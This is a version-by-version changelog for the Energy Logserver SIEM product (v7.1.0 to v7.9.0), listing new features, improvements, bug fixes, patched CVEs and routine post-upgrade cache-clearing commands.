Changelog
v7.9.0
NewFeatures
Empowered AI: AI Assistant - Meet “Prem”, our language model assistant
Empowered AI: AI Assistant - work with Energy AI Provider or choose local LLM as AI on Prem
Installation: Support for distributions based on Red Hat Enterprise Linux (RHEL) version 9
Integrations: Barracuda integration with dedicated dashboard and SIEM alerts
Login: The ability to limit the number of users in roles/groups(RBAC) has been introduced
new plugin: CMDB! Get a list of all sources connected to SIEM
new plugin: CRUD! CRUD indexes can work as internal database with edit and update option. Easy way to enrich SIEM with custom records.
Improvements
Agents: Introduced version checking of connected agents
Agents: Support for additional configuration files for Integrations plugin
Alert: IoC blacklists - support for End of Life (How long an IoC remains useful varies and is dependent on factors including initial confidence level, fragility, and precision)
Alert: Visibility of UI elements related to the Alerts/Quick Alert based on user role
Empowered AI: Create own AI prompts using buttons available from Discovery mode
Empowered AI: Simplified installation of Use Cases from the Empowered AI Store - added Advanced mode as an option
Index Management: Validation/User Notification: If a user sets the automatic data deletion period to less than 90 days, a warning will be displayed
Installation: The base repository is now sufficient for installation, the epel repository is no longer required
Integrations: Improved error handling when activating integration
Integrations: Unification of categories and names in Integrations and AI Store
Reports: Visibility of UI elements related to the Reports/Quick Report based on user role
Skimmer: Unification of field names in cluster monitoring metrics
Utils: configuration-backup.sh - added missing files: logserver.keystore & license files & empowered-ai configuration
Utils: logserver-password-util.sh - default passstore renamed to logserver.keystore
Utils: logserver-password-util.sh - improved error handling on missing files
Utils: logserver-password-util.sh - support for passwords with special character
BugFixes
Agents: Cleaning up unnecessary headers accumulating in the .agents index
Alert: Problem with discover_url in incidents tab
Empowered AI: AI Store - the option to select value for Rareness Threshold in advanced mode has been removed
Empowered AI: Anomaly multivariate results - the table does not reset after clicking reset/refresh
Empowered AI: API parameters escaping errors
Empowered AI: Build time frame and/or start date are set incorrectly by default
Empowered AI: Creating alert rules for text anomaly - a flat yaml file is not created with the rule
Empowered AI: Creating incidents from anomalies fix
Empowered AI: Deleting a rule forgets the page layout and search also sorting and filtering are cleared
Empowered AI: Logging of empowered-ai-realtime plugin in Network-Probe
Empowered AI: Logrotate configuration for the service (intelligence.log)
Empowered AI: Type error for limit_to_values field
Index Management: Default schedule cron pattern is incorrect in Rollover policy
Index Management: Incorrect handling of verify errors in Rollover policy and custom rules
Installation: Errors during installation due to the old cache version in sssd service
Integrations: Integration title instead of name in manifest files
Integrations: Prepareindex does not work in advanced mode
Login: Mapping for .reports and .agents has been added by default
Login: Role update for alerts and reports plugins
Network-Probe: Security fixes for dependencies: CVE-2025-6442 (webrick), CVE-2025-46727 (rack), CVE-2024-49761 (rexml)
Network-Probe: The API for verifying the status of all probes crashes when the registration documents in .networkprobes are malformed
Reports: Missing logo in .docx reports
Reports: Quick report does not take response from “pending” but from “running” state
Reports: The “origin” field in “schedulingData” blocks the creation of scheduled reports for dashboard export
SIEM Engine: GUI plugin overwrites the defaultIndex in the user config document
Older versions (v7.8.0 and below) - Click to expand
v7.8.0
NewFeatures
Archive: support for retention policy
Empowered AI: Online AI Store - get new models from https://energylogserver.com/ai-store/
Empowered AI: Online AI Store - integrated into Empowered AI Model Library directly from the system
Empowered AI: Online AI Store - AI model is delivered along with Alert definition
Empowered AI: Online AI Store - first Use Cases available for Netflow traffic
Network-Probe: Ability to create new,custom pipeline from GUI
new Plugin Integrations! Ability to manage integrations from GUI
new SIEM visualization! Live Threat Globe Map
Reports: Data Export Wizard from Discovery tab
Improvements
Alert: GUI - Default alert method set to NONE [create alert form]
Alert: GUI - Deleting multiple alerts at once
Alert: GUI - Enabled/disabled popup removed [create alert form]
Alert: GUI - Group/Category selection [create alert form]
Alert: GUI - No need to save alerts after creating/editing [create/edit alert form]
Alert: Performance - fix for Blacklist-IOC Alert Rule
Alert: Performance - size in query for aggregation in new_term rule
Alert: Playbooks - added pagination & collapse list
Empowered AI: Added a rule_name field to the results
Empowered AI: Allow aggregations only if they are smaller than the prediction time
Empowered AI: Time field taken from index pattern with the possibility of change + validation
Network-Probe: Improved misleading message when stopping/starting pipeline
Network-Probe: More filter plugins: added cybertrace, ldap, syslog filters
Network-Probe: status_refreshing_interval_seconds = 60s as default
Network-Probe: translog performance change - threshold_size:1mb, retention.age: 60s
Reports: better support for heavy overloaded systems
Reports: fully redesigned page for Data Export
Reports: saved_search support for Data Export
Reports: support for creating report for data without timestamp fields, like list of alerts
SIEM Engine: enriched application logs with username person who actively work in user interface
SIEM Engine: Documentation available on main screen as link to “Knowledge Base”
SIEM Engine: logserver_auth: performance boost - synchronous API replaced by asynchronous API
BugFixes
Alert: Manual Incident from Discover incorrectly saves discover_url field
Alert: no access to the discover_url from the alert by groups other than admin
Empowered AI: improvements for Anomaly Alerts in text
Empowered AI: Dark theme fix
Empowered AI: better doc_count support
Empowered AI: Error after opening a rule in a new window when it contains special characters
Empowered AI: Improved form for field mapping
Empowered AI: No mapping for last_modified field
Empowered AI: Sorting ai.anomaly_score and rules table
Index Management: Illegal_argument_exception fix
Index Management: Prepare_index exception fix
Network-Probe: Added support for invalid registration documents
Network-Probe: Fix installation of local .gem plugins
Network-Probe: Keystore create exception fix
Network-Probe: Registration ID should only be returned after the registration document has been successfully created
Reports: Index list download for Data Export
Reports: Timeout exception when generating Report export
Reports: URL in the data export contains an incorrect address/hostname in the sent email
SIEM Engine: Data table vis applies wrong filter when sorted
SIEM Engine: logserver_auth: hanging of http response when using synchronous client
SIEM Engine: patch for CVE-2025-2401 & CVE-2025-24016
Task Management: support for universal date format
v7.7.0
NewFeatures
Alert: Wizard from Discovery tab adds possibility to create alert rules
Empowered AI: import and export mechanism of rules
Empowered AI: rules as Use Cases with Categories!
Integrations: Stormshield integration with dedicated dashboard and SIEM alerts
OVA Appliance: base image is now Oracle Linux 8
Security: force safe cipher/SSL settings for all Energylogserver components
Improvements
Login: system gain extra stability when running under a data flood state. SIEM will stop indexing before running out of free space. Administrator will be still able to log in and clear unnecessary data.
Alert: added warning that changing a rule name affects chain and logical rules
Archive: added debug logs that will be saved by default if a task has failed with any error
Archive: added verification of the number of restored documents
Archive: changed the default archives location to
/usr/share/kibana/data/archive/archives/- breaking changeArchive: changed the way the files are recreated - added ‘Recreate missing files’ option [default: false] that verifies if all archived files exist in the archive folder path
Archive: extended the functionality of archive verification on demand - integrity is verified, as well as checksum
Archive: introduced
archive.integrityCheckoption [default: true] to verify the integrity of .zstd archive files at the end of the archivization taskArchive: optimized the preparation of the archivisation process by checking its document counts and .zstd file size instead of always calculating checksum
Empowered AI: ability to immediately stop building/scoring
Empowered AI: ability to view AI rule while building/scoring
Empowered AI: improvements in anomaly spread graph interactions
Empowered AI: information that Univariate works on aggregations
Installation: better support for multi-node environments
Integrations: updated translate{} synax to new format
Integrations: redesigned welcome screen
Network-Probe: clear info about actions that network probe is performing such as enabling pipelines or editing files
Network-Probe: option to create label describing probe
Network-Probe: option to navigate to pipeline’s files directly from the details section
Network-Probe: option to remove installed probe directly from the GUI - probe will be stopped as well as its services
Network-Probe: template for
.networkprobesindex to ensure correct mapping in case of any issuesNetwork-Probe: warning if probe’s local time may be misconfigured
Network-Probe: warning when probe version does not match the Energylogserver SIEM version
UBA/UEBA: new, sophisticated dashboards & documenation update
Skimmer: updated to v1.0.26
BugFixes
Alert: does not refresh aliases if roles for selected alerts are updated
Alert: fixed discover_url feature
Archive: fixed restoration of potentially corrupted archives - if any part of the file has been decompressed then an attempt will be made to upload its parts to the index
Archive: issue with not using
last_archive_datefrom archives metadataEmpowered AI: progress bar bugfixes
Empowered AI: fixed rules get stuck in Scoring status and never end [intelligence-scheduler]
Network-Probe: fixed initialization process
Network-Probe: fixed not closing managed services when shutting down [SIEM mode]
Network-Probe: fixed time displayed in the pipeline details
Network-Probe: logging - redirected some messages to the debug, while emphasizing only the important ones
Network-Probe: management - in rare cases old documents from unregistered probes were corrupting the output of some APIs
Network-Probe: not checking pipelines statuses when logstash service is not reachable
Network-Probe: suricata upgraded to v6.0.20
Network-Probe: verification if probe is currently active and available
Reports: issues with enabling/disabling scheduled reports
v7.6.0
NewFeatures
Energy Logserver SIEM LITE - Initial step into Cyber Security
MSSP license provides transparent view to licensed sources
Sources Management: identify each source activity
UBA: SIEM module for tracking the nature of the user’s behaviour and its changes
UBA AI: predefinied AI rules to detect anomalies in user behavior
Login: Introducing a new user to manage the system’s graphical interface: admin (disables logserver account)
Improvements
Alert: cross-field-correlation in Logical alert method
Alert: improved time tolerance for run_once option
Alert: mapping change to be able to search by rule name in alert_error indices
Audit: new audit selection - now includes all plugins by default
Archive: improved error handling and task resuming
Cerebro: HSTS header support
Config: configuration-backup.sh includes agent keys and siem-engine config file
Config: logserver-password-util.sh: new password management tool changes system passwords easly
Empowered AI: create rule with Saved Search or index pattern with query dsl
Empowered AI: aggregation preview for univariate rule
Empowered AI: improved model encryption
Integrations: Dell Avamar added to default integrations
Login: status-page link added to top menu
Skimmer: output addresses support lists of nodes for fault tolerance
Skimmer: support for URI schemes in config file, i.e. http, https
Skimmer: migrated to libcurl
Skimmer: updated to v1.0.25
BugFixes
Alert: adding a note to an incident doesn’t work
Alert: long_term method does not work for objects
Cerebro: fix for permissions verification
Cerebro: limit on the used HEAP memory
Empowered AI: anomalies increase by zooming in on the graph
Empowered AI: cleared placeholder in text anomaly
Empowered AI: incorrect handling of state:storeInSessionStorage
Empowered AI: name change of the axis in the charts of univariate
Empowered AI: performance tab display error for large number of fields in multivariate
Empowered AI: rareness threshold does not fill in the scheduled model
SIEM Engine: incorrect verification when diskspace thresholds are not enabled
SIEM Engine: redirect loop after session expiration
SIEM Engine: the list of domains available for logging does not refresh after changing the authorization plugin settings
SIEM Engine: cluster does not start after disabling authorization plugin
SIEM Engine: filter error messages in AuthService
SIEM Engine: task of deleting old tokens now starts automatically
Network-Probe: pipeline details are now displayed curectly
Reports: banner with information about the expiring license or the diskspce visible on docx reports
Reports: fix for executing scheduled reports
Reports: visualization selection does not display all of them if there are more than 1000 of them
SIEM Engine: on_start inventories disabled by default
Task Management: show query duration
Task Management: show user matching similar query
v7.5.0
NewFeatures
Empowered AI - anomaly detection in text message - rare words probability
Empowered AI - anomaly detection in numbers
Empowered AI - anomaly detection in multi dimention numbers
Empowered AI - Root Cause tracing based on knowledge model
Empowered AI - Relations Mining builds knowledge model
Empowered AI - unsupervised data clustering
Empowered AI - forecasting alerting method
Empowered AI - AI input for network probe
Empowered AI - realtime processing for AI rules
Empowered AI - Model Library - save, store and upload AI models
Empowered AI - Model Library - reuse and retraint saved models
Empowered AI - Text Anomaly default alerts
Empowered AI - create manual incident based on AI results
Empowered AI - easy create alerts tab from AI rules config
Empowered AI - progress bar for started rules
BugFixes
Alert: added custom arguments to Energy SOAR integration
Alert: added support for external_link to Energy SOAR integration
Alert: groups management
Alert: missing url in alert_text arguments of the Energy SOAR method
Archive: clearing issue with empty with non existing file metadata
Archive: scrolling in case of visible warnings
CMDB: data fetching at the plugin startup
Integrations: built-in templates now use wildcards
SIEM Engine: improved alias refresh synchronization
Network Probe: deleting config files and handling deleted files from disk
Network Probe: filtering of probe’s statuses has been fixed
Network Probe: fixed when probes’ services statuses were unavailable
Network Probe: layout improvements and readability refinements
Network Probe: updated log messages to be more comprehensible
Network Probe: fixed permissions problem with external services
Reports: improved handling of time fields
SIEM Engine: improved RBAC mapping existence verification for non-admin users
SIEM Engine: updated to v4.7.4 due cve [CVE-2023-42463, CVE-2024-32038]
Task Management: improved filtering tasks by their duration
v7.4.3
NewFeatures
Query management: identify and stop long running query
Introducting Network-Probe as mandatory Input Layer
Archive: checksum verification on demand
Empowered-AI: default AI forecasting rules
License: GUI license upload with automatic distribution in cluster environment
Introducing “Status page”: showing health check in case of system problem without ability to log in
Free space warning on status and login page
Free space protection: Enabling Watermarks to keep system running in case of free space issue
Audit: enchancements to audit more GUI actions
Improvements
Alerts - Blacklist: wrong file name support
Alerts: Risk key can be set on non default field - SOAR integration
Alerts: secure und insecure webhook support
Archive: Date format change to epoch in milisec
Input layer uses Logstash-OSS 7.17.18
license-service: dedicated API
Skimmer: self monitoring of free space on cluster nodes
Skimmer: self monitoring of license API status
Support for Beats OSS Agents 7.17.18
BugFixes
Alerts: cannot select more than one index-pattern when creating/editing a rule
Alerts: empty role list when creating a rule without the admin role
Alerts: Energy SOAR method wrong WYSIWYG behavior
Alerts: errors when creating risks if any already exist
Alerts: Manual Incident: user without admin role cannot create an incident
Alerts: Manual Incident: user without admin role cannot see his incident
Alerts: notifications are not sent as a valid HTML email
Alerts: rule name change did not remove the old rule
Archive: partial restore
Archive: preparing data for archiving
Audit: exclusions on _nodes and _stats do not work
Audit: missing information about operations on users and roles
Audit: missing query content - if selected
Intelligence - view in discover: application not found
license-service: memory limitations
Login: AD login exception for users without mapped roles
Login: SSO login duplicate users
Reports: short link when creating docx report
SIEM Engine: Agent/Client updated to v4.5.4
SIEM Engine: permission denied after upgrade
status_page: missing branding
xlsx-import: fixing bug when writing more than 500 documents
v7.4.2
NewFeatures
Introducing Empowered-AI - Your data science module
Empowered-AI: Forecasting usecase !
Alerts: NEW rule type for Forecasting : Difference Multi Pattern - matches the difference between two index patterns calculated in a unit of time.
Archive: repository validation (automatic scan of archive files and indices)
SQL query support: query Your data with SQL query with dedicated GUI console
Integrations: NEW Labyrinth - Deception-based threat detection
Improvements
Archive: cataloging for better retention: \(archivefolderpath/\)year/$month
Archive: sorting, pagination and filtering on task lists
Archive: support for huge repositories
Disaster Recovery: improvements during cluster initialization and recovery
Disaster Recovery: logs for damaged indexes have been enriched with index_id
Disaster Recovery: possibility of disabling the authorization plugin
GUI: improvements in updating the client (browser) cache after Update
license-service: possibility to change log_level & default log_level changed to WARN
Reports: accept only the unix cron format in recurring reports
Reports: clear descriptions for settings which deletes obsolete files
Reports: dedicated MIME type for docx reports
Reports: filenames created by recurring reports now based on creation date
Sync: improved logging and error handling
BugFixes
Archive: delete the results file when deleting a search task
Archive: missing .zstd files and .dec files are not deleted after decryption
Archive: unable to prepare data for selected indices fix
Audit: user and role actions were filtered from audit queue due to missing username
configuration-backup & support-tool: now supports all logserver versions
E-doc: e-doc user requires gui-access to query the GUI authorization for a token
GUI: wait until refreshAliases finishes at user login
install.sh: problem with symlink when installing only the data-node
Login: deprecated route to the default home plugin
Reports: enable/disable for recurring report was not shown in GUI
Reports: impossible to delete a recurring report without assigned file
Reports: incorrect capture of “data table” and “tag cloud” visualization
Reports: incorrect formatting of email messages and the “mail” command
Reports: selected time field was not saved in the “data export” report
Reports: temporary jpeg file not deleted after creating pdf report
Reports: tsvb-based visualizations are incorrectly captured in docx reports
Scheduler: “Archive task updated, but error occured when updating scheduler object. Please retry” fix
Sync: tasks cannot be deleted
Sync: unable to create/update profile
xlsx-import: invalid file extension validation
SIEM Plan
Alerts: NEW rule type: Difference Multi Pattern - matches the difference between two index patterns calculated in a unit of time.
Alerts: bugfix: alert index rollover causes service errors
Alerts: bugfix: sorting alert risk on incident tab did not work properly
Alerts: bugfix: problem with updating alert rules
Alerts: bugfix: Energy SOAR + metric_aggregation does not create artifacts
Alerts: bugfix: Run Once old history after updating alert rule
SIEM Engine: bugfix: duplicate index-pattern siem*
v7.4.1
NewFeatures
Reports: DOCX support!
Improvements
Alert: multi-language support for alert rules
API: gui-access role is required to interact with the API
tlstool.sh: new ssl certificate management tool
BugFixes
Archive: support for “secure” and “insecure” mode (without valid certificates)
GUI: better-handled exceptions for custom plugins
GUI: defaultAppId directive has been restored
GUI: invalid directory for keystore
GUI: Module Access Control permission fix
GUI: users have aliases for different indexes after migration
Index Management: missing verification for “on save” action
Index Management: errors during rollover
Index Management: filtering using the “Enabled” column
Index Management: unable to update job after changing cron
Integrations: improved command for importing dashboards
Reports: custom logo moves the visualization on the dashboard
Reports: deleting reports (multi, single) does not refresh the list
Reports: enabling and disabling periodic reports by users
Reports: incorrect visualization titles are inserted when creating a Data Table report
Reports: long comment goes off the page when creating a PDF report
Reports: long title goes off the page when creating a PDF report
Reports: not translated statuses in the task list
Reports: problem with Tag Cloud visualization when creating PDF report
Reports: reports role paths to update, now require
.reportsScheduler: status table sorted by “start date” instead of “name”
Timeline/Timelion: regex not working due to an incorrectly built package
SIEM Plan
Alerts: bugfix: incorrect _id of the edited alert causes duplicates
Alerts: bugfix: unable to retrieve a list of risk key fields when updating a rule
SIEM Engine: better-handled exceptions in RBAC integration
CVE-2023-32002
CVE-2023-32006
CVE-2023-32559
CVE-2021-32014
CVE-2021-32012
CVE-2021-32013
CVE-2023-30533
CVE-2022-24785
CVE-2022-31129
CVE-2022-24785
CVE-2022-31129
CVE-2023-22467
CVE-2023-30533
CVE-2023-26115
v7.4.0
Upgrades
Complete database redefinition:
Segment replication
Searchable snapshots
Search backpressure feature can now cancel queries at the coordinator level
Complete user interface redefinition
Complete SIEM Engine redefinition:
New manager
New App
New Agent
Input layer uses Logstash-OSS 7.17.11
Support for Beats OSS Agents => 7.17.11
NewFeatures
Logserver: RBAC integration with Wazuh Engine (users can map roles between systems)
Improvements
CMDB: Browser-based Time Zone
Improved error handling when reloading a license (logserver/license/reload)
Archive: deleting tasks with multiselect option
Unification and organization of Energy Logserver system APIs
Alert: WebHook: added support for nested fields in http post payload
Agents: built-in agents templates updated to 7.17.11
BugFixes
CMDB: incorrect parsing of values in the date filter
Archive: blank line in index list on restore
v7.3.0
NewFeatures
Multi-Language Support
Improvements
Improved security by using response security headers
Network Probe: version lock prevents accidental updates
configuration-backup.sh activated by default
BugFixes
Reports: usage of “Include unmapped fields” cause “No data” when exporting csv
Agents: corrected manifest file for downloading agents
Archive: error while restoring encrypted archives
Cerebro: corrected auto-login after redirect
Integrations
VMware: Integration with dedicated dashboard and alerts
AWS: Integration with dedicated dashboard and alerts
Ruckus Networks: Integration with dedicated dashboard and alerts
Added Beats templates to beats integration
SIEM Plan
WatchGuard: Integration with dedicated dashboard and alerts
IDS Suricata: Integration with dedicated dashboard and alerts
Alerts: updated rule database with 90 new alert rules including new Windows Security Group
Alerts: bugfix: Jira integration
Alerts: bugfix: duplication of alarms in specific cases
Alerts: bugfix: top_count_keys doesn’t work properly with multiple query_keys
Alerts: bugfix: Broken Chain method TypeError
Alerts: bugfix: Exclude Fields for Logical/Chain body correlation
Alerts: NoLog rule for each alarm group
Network-Probe
Added support for sFlow - sfacctd service
Added IDS Suricata integration with dedicated dashboard and alerts
log4j - logstash-input-tcp
Required post upgrade
Recreate bundles/cache:
rm -rf /usr/share/kibana/optimize/bundles/* && systemctl restart kibana
v7.2.0
Breaking changes
Login: changed how gui access is granted for administrative users - access for any administrator has to be explicitly granted
Wiki portal renamed to E-Doc
NewFeatures
CMDB: Infrastructure - create an inventory of all sources sending data to SIEM
CMDB: Relations - ability to create relation topology map based on sources inventory
Extended auditing support - each plugin can be enabled in GUI config to save its actions in the audit index
Syntax Assistant for Alerts, Agents, Index Management, Network Probe. Check YAML definition and structure
Improvements
Update process will not override /etc/sysconfig/elasticsearch config
Clear GUI message for expired license
Agents: improved services information display for not running agents
Archive: optimization and improvements; added multi threaded processing and Task Retry support
Login: redesigned audit selection and exclusion settings GUI
Reports: tasks edit is now more robust and allows modification of advanced parameters
Reports: moved settings into new Config tab in the plugin from Config -> Settings
Alerts: loading new alarm Rule Set during update process [install.sh]
Beats: updated to v7.17.8
Skimmer: negotiate highest TLS1.3 version if possible
Skimmer: fixes regarding ssl connection
Skimmer: added elasticsearch_ssl config option
Skimmer: added new metric: node_stats_fs_total_free_in_pct
Skimmer: updated to v1.0.22
Elasticdump updated to v6.79.4
BugFixes
Refreshing audit exclusions caused ELS node to freeze in rare cases
Update process on RedHat 7.9 could not be run caused by missing package
LDAP login: improved validation on username input
Table visualization: fix for “Count percenteges”, which was inacurate in some cases
Skimmer: sometimes did not start after installation
Agents: small GUI improvements
Alerts: long alert names presented outside the frame
Alerts: sorting alert risk on incident tab did not work properly
Intelligence: malware scanners would rise a false positive on one of the plugin dependencies
Reports: data export (csv) improvements on file integrity
Reports: a rare case of a race condition when removing temporary directories
E-Doc: improvements to https handling when using Elasticsearch as a search engine
install.sh: installation process always uses LC_ALL=C
Integrations
Added new integrations: FireEye, Infoblox, ArcSight Common Event Format
SIEM Plan
Agents: SIEM agents updated to 3.13.6
Alerts: new notification methods: ServiceNow, WebHook, TheHive, Jira
Alerts: risk values on incident tab formated for clarity
Alerts: example description supplied with new values regarding escalate and recovery
Alerts: all alerts in a goup can be seen with a proper row selection
Alerts: creating risks is now supported on no time based indices
Alerts: long alert names presented outside of message frame
Alerts: on incident tab sorting by risk did not work properly
Alerts: added Ransomware Detection rules
Network-Probe
Increased tolerance for status/verification calls
Security related
axios - CVE-2021-3749
qs - CVE-2022-24999
express - CVE-2022-24999
moment - CVE-2022-24785
moment - CVE-2022-31129
minimist - CVE-2021-44906
char.js - CVE-2020-7746
async - CVE-2021-43138
minimist - CVE-2021-44906
requestretry - CVE-2022-0654
xmldom - CVE-2022-39353
underscore - CVE-2021-23358
flask-cors - CVE-2020-25032
kibana - CVE-2022-23707
Required post upgrade
Recreate bundles/cache:
rm -rf /usr/share/kibana/optimize/bundles/* && systemctl restart kibanaWiki portal renamed to E-Doc: if data migration is required follow the steps of UPGRADE.md
v7.1.3
Security related
log4j updated to 2.19.0
kafka updated to 2.13-3.3.1 (log4j dependency removed)
logstash: removed obsolete bundled jdk
v7.1.2
NewFeatures
Energy SOAR: Redesigned and improved integration (Security Orchestration, Automation And Response)
Intelligence: Redesigned and improved Forecasting [experimental]
Masteragent: New feature: Configuration Templates
New plugin: CMDB - simple implementation of Configuration Management Database
Improvements
es2csv - Performance boost and Memory optimization
Reports: Support for large report files
Redirection of HTTPS connection to GUI enabled by default - 443 => 5601
Login: Home Page moved to Integrations Page
diagnostic-tool.sh - Added logstash logs
Elasticsearch: Global timeouts changed to 60s
Updated LICENSE in all components
Index Management: Prepare index has been moved from Config to Index-Management tab
Masteragent: Setting authorization with a client certificate by default
Masteragent: Possibility to fully disable the HTTP server on masteragent clients
BugFixes
Login: Fixed problems with sharing Short Links
Discovery: Fixed problem with index-patterns name overlapping
Index Management: Fixed execution time for builin logtrail policies
Masteragent: Fixed error when getting installed services
Integrations
windows-ad: Fixed error in Ad Accounts dashboard
beats - Fixes in waf ruby filter
SIEM Plan
Vectra.AI: Integration with dedicated dashboard and alerts
MITRE added to SIEM Dashboard
Agents: SIEM agents updated to 3.13.4
Agents: Vulnerability detection & feeds enabled by default
Alert: Simplified discover_url feature
Alert: theHive project - Improved integration
Alert: Fixed exception for risk query
Alert: SIEM alert group changed to “Correlated”
Alert: Fixed problem with TypeError: deprecated_search()
Alert: Fixed logs problem after rotating the file
Alert: Fixed permission problem in Run Once mode
Alert: Fixed indentation in query_string
[bugfix] Added missing library to Qualys Quard venv
[bugfix] Added missing ports 1514udp-tcp/1515tcp to install.sh
Required post upgrade
Recreate bundles/cache:
rm -rf /usr/share/kibana/optimize/bundles/* && systemctl restart kibana(SIEM only) Update/ReImport SIEM Dashboard for MITRE
v7.1.1
NewFeatures
Elasticsearch Join support - API level query
Improvements
es2csv - Breakthrough (50%) performance boost
es2csv - Renamed to els2csv
diagnostic-tool.sh - Added logs encryption
diagnostic-tool.sh - Renamed to
support-tool.shSkimmer: Indices_stats: run only on master node
Skimmer: Added two metrics: indices_stats_patterns and indices_stats_regex
Skimmer: Added cached info about nodes when poll errors out
Logtrail: Disabled ratelimit in rsyslog for logtrail source files
Logtrail: Parsing in pipeline for alert,kibana,elasticearch,logstash [added standardized log_level field]
Logtrail: Added default filter showing only errors [“NOT log_level: INFO”]
Index Management: Added built-in index policies for common actions
Discovery: Default QueryLanguage changed to Lucene
Cerebro updated to v0.9.4
Curator updated to v5.8.4
Elasticdump updated to v6.79.4
Wiki.js updated to v2.5.274
BugFixes
Login: In case of unsuccessful login information about “redirection” is lost when using link sharing
Login: When logging using SSO auth, it doesn’t redirect when using link sharing
Login: Fixed “unable to parse url” when using link sharing
Login: Corrected Session expired message
Login: gui-access role added to role-mappings.yml
Login: When logging using SSO auth, sending the entered password as a default action
Skimmer: Index store value of _cat/shards in bytes
Skimmer: Disabled ssl handshake on logstash api
Logtrail: Corrected syntax highlighting
Logtrail: Fixed filter selector on columns
Discovery: Fixed timeout handling
Wiki: Removed gui-access group
Index Management: Wait for updates before refreshing the list
Index Management: Fixed id problem during custom update
Integrations
windows-ad/beats: fixed error in ruby{} filter
netflow - Fixes from 7.1.0
netflow - network_vis - Fixed incorrect filtering
netflow - network_vis - Added new option “skip null values”
syslog-mail - Fixes from 7.1.0
SIEM Plan
Added Log4j RCE attacks to Detection Rules [“Wazuh alert [HIGH] - rule group: custom - Log4j RCE”]
Alert: Fixed problem with modifying alertrulemethod
Alert: Fixed malfunction of Test Rule in case of “verify_certs: false” setting
Alert: Simplified Discovery URL
Alert: Logtrail - Cluster Services Error Logs added to Cluster-Health group
Security related
http-proxy - CVE-2022-0155
xlsx - CVE-2021-32013
json-schema - CVE-2021-3918
lodash - CVE-2021-23337
json-schema - CVE-2021-3918
pdf-image - CVE-2020-8132
angular-chart.js - CVE-2020-7746
pyyaml - CVE-2020-14343
cryptography - CVE-2020-25659
aws-sdk - CVE-2020-28472
pyyaml - CVE-2020-14343
nodemailer - CVE-2020-7769
objection - CVE-2021-3766
socket.io - CVE-2020-28481
nodejs - CVE-2021-44531
v7.1.0
NewFeatures
Added support for AlmaLinux and RockyLinux
Agents: Added local repository with GUI download links for agents installs
Archive: Added ‘Run now’ for scheduled archive tasks
Archive: Added option to enable/disable archive task
Archive: Added option to encrypt archived data
Audit: Added report of non-admin user actions in GUI
Elasticsearch: Added field level security access control for documents
Kibana: Added support for Saved Query object in access management
Kibana: Added support for TLS v1.3
Kibana: Added new plugin Index Management - automate index retention and maintanance
Reports: Added new report type created from data table visualizations - allows creating a raport like table visualization including all records (pagination splitted into pages)
Reports: Added option to specify report task name which sets destination file name
Improvements
Security: log4j updated to address vulnerabilities: CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832, CVE-2021-4104
Added new directives for LDAP authenctication
Agents: Changed agent’s action name from drop to delete
Archive: Improvement and optimization of “resume” feature
Archive: Optimised archivization proces by saving data directly to zstd file
Archive: Multiple ‘Upload’ GUI improvements
Archive: Improved logs verbosity
Audit: Added template for audit index
Beats: Updated to v7.12.1
Curator: Added curator logs for rotation
Elasticsearch: Extended timeout for starting service
Elasticsearch: Updated engine to v7.5.2
install.sh: Improved update section for better handling of services restart
Kibana: Updated engine to v7.5.2
Kibana: Clean SSL info in logs
Kibana: Improved built-in roles
Kibana: Disabled telemetry
Kibana: Set Discovery as a default app
Kibana: Optimized RPM
Kibana: Improved handling of unauthorized access in Discovery
Kibana: small changes in UI - Improved Application RBAC, product version
Kibana: Added new logos
Kibana: Improved login screen, unauthorized access info
Kibana: Restricted access to specific apps
Kibana: Added option to configure default app
Logrotate: Added Skimmer
Logstash: Updated to v7.12.1
Network visualization: UI improvements
Object permission: Index pattern optimizations
Plugins: Moved Cluster Management inoto the right top menu, Scheduler and Sync moved to the Config
Reports: Added report’s time range info to raport details description
small_backup.sh: Added cerebro and alert configuration
Skimmer: Updated to v1.0.20
Skimmer: Added new metrics, pgpgin, pgpgout
Skimmer: Optimised duration_in_milis statistics
Skimmer: Added option to specify types
Skimmer: Added option to monitor disk usage
Wiki: Added support for nonstandard kibana port
Wiki: Several optimizations for roles
Wiki: Changed default search engine to elasticsearch
Wiki: Added support for own CAs
Wiki: Default authenticator improvements
XLSX Import: UI improvements
BugFixes
Archive: Fixed problems with task statuses
Archive: Fixed application crash when index name included special characters
Archive: Fixed ‘checksum mismatch’ bug
Archive: Fixed bug for showing unencrypted files as encrypted in upload section
Elasticsearch: Fixed bug when changing role caused client crash
Elastfilter: Fixed “_msearch” and “_mget” requests
Elastfilter: Fixed bug when index pattern creation as an admin caused kibana failure
Kibana: Fixed timeout handling
Kibana: Fixed a bug causing application crash when attempting to delete data without permission to it
Logstash: Fixed breaking geoip db when connection error occurred
Object permission: Fixed adding dashboard when all its related objects are already assigned
Reports: Added clearing .tmp files from corrupted csv exports
Reports: Fixed sending PDF instead of JPEG in scheduled reports
Reports: Fixed not working scheduled reports with domain selector enabled
Skimmer: Fixed expected cluster nodes calculation
Wiki: Added missing home page
Wiki: Added auto start of wiki service after installation
Wiki: Fixed logout behaviour
Integrations
Fixed labels in Skimmer dashboard
Fixed Audit dashboard fields
Updated Windows + AD dashboard and pipeline
Added Linux Mail dashboard and pipeline
Added Cisco ASA dashboard and pipeline
Added FortiGate dashboard and pipeline
Added Paloalto dashboard and pipeline
Added Oracle dashboard and pipeline
Added Waystream dashboard and pipeline
Added CEF dashboard and pipeline (CheckPoint, FireEye, Air-Watch, Infoblox, Flowmon, TrendMicro, CyberX, Juniper Networks)
Added monitoring of the alert module on Alert Dashboard
SIEM Plan
Updated SIEM dashboard
Updated QualysGuard integration
Updated Tenable.SC integration
Alert: Updated detection rules (370+)
Alert: Added Cluster-Health alert rules
Wazuh: Updated to v3.13.3
Wazuh: UI improvements
Alert: Improved groups management
Alert: Multiple UI/UX tweaks
Alert: Revised alerts’ descriptions and examples
Alert: Adding included fields when invert:true
Alert: Changed startup behaviour
Alert: Added field from ‘include’ to match_body
Alert: Optimised loading files with misp lists
Alert: Added option to set sourceRef in alert definition
Alert: Include & Exlcude in blacklist-ioc lists
Alert: Fixed several issue in chain and logical alerts
Alert: Fixed error when user tried to update alert from newly added group
Alert: Fixed top_count_keys not working with multiple query_key
Alert: Fixed bug when match in blacklist-ioc is breaking other rules
Alert: Fixed empty risk_key breaking alert rule
Alert: Fixed endless loop during scroll
Network-Probe
Added integration with license service
Changed plugin icon
Changed default settings
Changed logs mapping in logstash
Optimised netflow template to be more efficient
Updated .service files
Updated Network-Probe dashboard
API Changes
Elasticsearch: Updated API endpoints.
